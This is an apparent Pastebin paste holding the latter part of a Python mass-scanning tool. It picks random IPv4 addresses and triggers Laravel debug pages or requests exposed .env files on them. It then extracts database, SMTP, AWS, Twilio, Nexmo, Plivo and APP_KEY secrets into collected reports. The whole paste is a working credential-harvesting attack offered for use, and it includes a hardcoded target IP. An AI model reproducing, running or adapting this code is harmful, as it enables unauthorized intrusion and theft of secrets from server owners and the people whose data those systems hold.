  172. def value(self, raw_name, *args, **kwargs):
  173. soup = self._soup[self.threadName]
  174. re_name = re.compile(r"(?i)\s*%s\s*" % raw_name, *args, **kwargs)
  175. name = soup.find(text=re_name)
  176.  
  177. if name:
  178. sf_dump = name.findNext(class_="sf-dump-str")
  179. if sf_dump:
  180. x = self.valid(sf_dump.text)
  181. if x: return x
  182.  
  183. value_ = name.findNext(text=True)
  184. if value_:
  185. x = self.valid(value_.string)
  186. if x: return x
  187.  
  188. reg = re.compile(r"(?i)%s=([^>]+?)(?:\n|$)" %
  189. raw_name, *args, **kwargs)
  190. value = reg.search(str(soup))
  191. if value:
  192. return self.valid(value.group(1))
  193.  
  194. def build(self, args, fn=lambda x: x):
  195. items = []
  196. for key in args:
  197. value = fn(key)
  198. if value:
  199. items.append(f"{key}={value}")
  200. if len(items) < 1:
  201. return None
  202. return "\n".join(items)
  203.  
  204. def grabAll(self, raw, msg=None):
  205. with lock:
  206. self._soup[self.threadName] = bs4.BeautifulSoup(raw, "html.parser")
  207.  
  208. status = False
  209. header = msg or ""
  210. for fn in self._fn:
  211. name = fn.__name__[5:].replace("_", "")
  212. resp = fn()
  213.  
  214. if resp:
  215. print("\x1b[92m%s\x1b[0m: found credential: \x1b[92m%s\x1b[0m" % (
  216. self.threadName, name))
  217.  
  218. resp = resp.strip()
  219. t = 3 if resp.count("\n") > 0 else 1
  220.  
  221. if t == 3:
  222. resp = "\n" + resp
  223. if not resp.startswith("`"):
  224. resp = f"{'`' * t}{resp}"
  225. if not resp.endswith("`"):
  226. resp = f"{resp}{'`' * t}"
  227.  
  228. resp = ("===== #%s =====\n"
  229. "%s" % (name.upper(), resp))
  230. with lock:
  231. s.append(header + resp)
  232. status = True
  233. return status
  234.  
  235. # == Grab Fn: Tambahin sendiri kalau paham ====
  236.  
  237. def grab_database(self):
  238. return self.build(keywords["database"], fn=self.value)
  239.  
  240. def grab_apache(self):
  241. return self.build(keywords["apache"], fn=self.value)
  242.  
  243. def grab_nexmo(self):
  244. return self.build(keywords["nexmo"], fn=self.value)
  245.  
  246. def grab_twilio(self):
  247. return self.build(keywords["twilio"], fn=self.value)
  248.  
  249. def grab_plivo(self):
  250. return self.build(keywords["plivo"], fn=self.value)
  251.  
  252. def grab_app_key(self):
  253. key = self.value("APP_KEY")
  254. if not key or not key.startswith("base64:"):
  255. return
  256. return f"APP_KEY={key}"
  257.  
  258. def grab_smtp(self):
  259. return self.build(keywords["smtp"], fn=self.value)
  260.  
  261. def grab_aws(self):
  262. def get_region():
  263. yreg = re.compile('(?i)us\\-east\\-1|us\\-east\\-2|us\\-west\\-1|us\\-west\\-2|af\\-south\\-1|ap\\-east\\-1|ap\\-south\\-1|ap\\-northeast\\-1|ap\\-northeast\\-2|ap\\-northeast\\-3|ap\\-southeast\\-1|ap\\-southeast\\-2|ca\\-central\\-1|eu\\-central\\-1|eu\\-west\\-1|eu\\-west\\-2|eu\\-west\\-3|eu\\-south\\-1|eu\\-north\\-1|me\\-south\\-1|sa\\-east\\-1')
  264. text = yreg.search(str(self._soup[self.threadName]))
  265. if text:
  266. return text.group()
  267.  
  268. dat = {k: v for k, v in keywords.items() if k.startswith("aws")}
  269.  
  270. r = {}
  271. for k, v in dat.items():
  272. name = "|".join(map(re.escape, v))
  273. value = self.value(name)
  274. if value:
  275. r[k] = value
  276. if not r.get("aws_region"):
  277. region = get_region()
  278. if region:
  279. r["aws_region"] = region
  280.  
  281. region = r.get("aws_region")
  282.  
  283. if region and len(r) < 2:
  284. return
  285.  
  286. resp = ""
  287. for k, v in r.items():
  288. resp += f"{k.upper()}={v}\n"
  289. return resp
  290.  
  291. # == END ==
  292.  
  293.  
  294. q = queue.Queue()
  295.  
  296. q.put("http://3.1.108.34")
  297.  
  298. lock = threading.Lock()
  299. ga = GrabAnything()
  300.  
  301. etc_key = keywords["etc"]
  302. alias = {i[0].upper(): i[1] for i in etc_key if not isinstance(i, str)}
  303.  
  304. xreg = re.compile("(?i)" + r"|".join(
  305. r"(?P<%s>%s)" % (
  306. k, "|".join(
  307. map(lambda bv: re.escape(bv if isinstance(bv, str) else bv[0]), v))
  308. ) for k, v in keywords.items()
  309. ))
  310.  
  311.  
  312. def is_alive(url):
  313. try:
  314. r = requests.head(url, timeout=3, allow_redirects=True)
  315. return r.status_code
  316. except Exception as e:
  317. return False
  318.  
  319.  
  320. def worker():
  321. global total_
  322. while not stop:
  323. url = q.get()
  324.  
  325. try:
  326. parsed = urlparse(url)
  327. url = "http://{}".format(
  328. parsed.netloc or url.split("/", 1)[0].split("|")[0])
  329. tname = threading.currentThread().name
  330.  
  331. if is_alive(url):
  332. result = None
  333. method = ""
  334.  
  335. try:
  336. print("\x1b[34m%s\x1b[0m: %s (POST)" % (tname, url))
  337. r = requests.post(url, data=[],
  338. verify=False, timeout=3,
  339. headers={'User-agent': 'Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'})
  340. res_t = xreg.findall(r.text)
  341. if res_t:
  342. method = "DEBUG"
  343. result = (res_t, r.text)
  344.  
  345. except Exception:
  346. pass
  347.  
  348. if result is None:
  349. for path in env_path:
  350. try:
  351. print(
  352. "\x1b[34m%s\x1b[0m: %s/%s (GET)" % (tname, url, path))
  353. r = requests.get("/".join([url, path]), allow_redirects=False,
  354. verify=False, timeout=3,
  355. headers={'User-agent': 'Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'})
  356. res_t = xreg.findall(r.text)
  357. if res_t:
  358. method = path
  359. result = (res_t, r.text)
  360. break
  361. except Exception as e:
  362. pass
  363.  
  364. if result is not None:
  365. result, raw = result
  366.  
  367. print(
  368. "\x1b[92m%s\x1b[0m: found %s matches credentials: \x1b[92m%s\x1b[0m (%s)" % (tname, len(result), url, method))
  369.  
  370. ip = re.sub(r"^https?://", "", url)
  371. try:
  372. host = socket.gethostbyaddr(ip)[0]
  373. if is_alive(host):
  374. url = "http://" + host
  375. except Exception:
  376. pass
  377.  
  378. x = ("- url: %s\n"
  379. "- ip: `%s`\n"
  380. "- method: `%s`\n\n"
  381.  
  382. "" % (url + ("/" + method if method != "DEBUG" else ""),
  383. ip, method))
  384. if not ga.grabAll(raw, msg=x):
  385. x = x.strip()
  386.  
  387. fo = set()
  388. for i in set(result):
  389. for y in filter(None, i):
  390. y = y.upper()
  391. fo.add(alias.get(y, y))
  392.  
  393. if len(fo) > 0:
  394. x += "\n- found: "
  395. x += ", ".join("`%s`" % i for i in fo)
  396.  
  397. with lock:
  398. s.append(x)
  399.  
  400. else:
  401. print(
  402. "\x1b[91m%s\x1b[0m: %s: \x1b[93mNo Credentials\x1b[0m" % (tname, url))
  403. else:
  404. if PRINT_SITE_DOWN:
  405. print("\x1b[91m%s\x1b[0m: %s: Site Down!" % (tname, url))
  406. except Exception as e:
  407. if hasattr(e, "args") and len(e.args) == 2:
  408. e = e.args[1]
  409. print("\x1b[91m%s\x1b[0m: Error: %s" % (tname, str(e).strip()))
  410.  
  411. with lock:
  412. total_ += 1
  413.  
  414. q.task_done()
  415.  
  416.  
  417. def rand_v4():
  418. while not stop:
  419. ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
  420. if xhreg is None or xhreg.search(ip):
  421. yield ip
  422.  
  423.  
  424. th = threading.Thread(target=send_worker)
  425. th.setDaemon(True)
  426. th.start()
  427.  
  428.  
  429. threads = [th]
  430.  
  431. try:
  432. for _ in range(thread):
  433. th = threading.Thread(target=worker)
  434. th.setDaemon(True)
  435. th.start()
  436.  
  437. threads.append(th)
  438.  
  439. for line in rand_v4():
  440. while q.qsize() > thread:
  441. continue
  442. q.put(line)
  443.  
  444. q.join()
  445.  
  446. except:
  447. pass
  448.  
  449. try:
  450. stop = True
  451. for i in threads:
  452. if i.is_alive() and not q.empty():
  453. print(
  454. "\x1b[93m%s\x1b[0m: waiting for the data to finish processing" % i.name)
  455. i.join()
  456. except:
  457. pass
  458.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!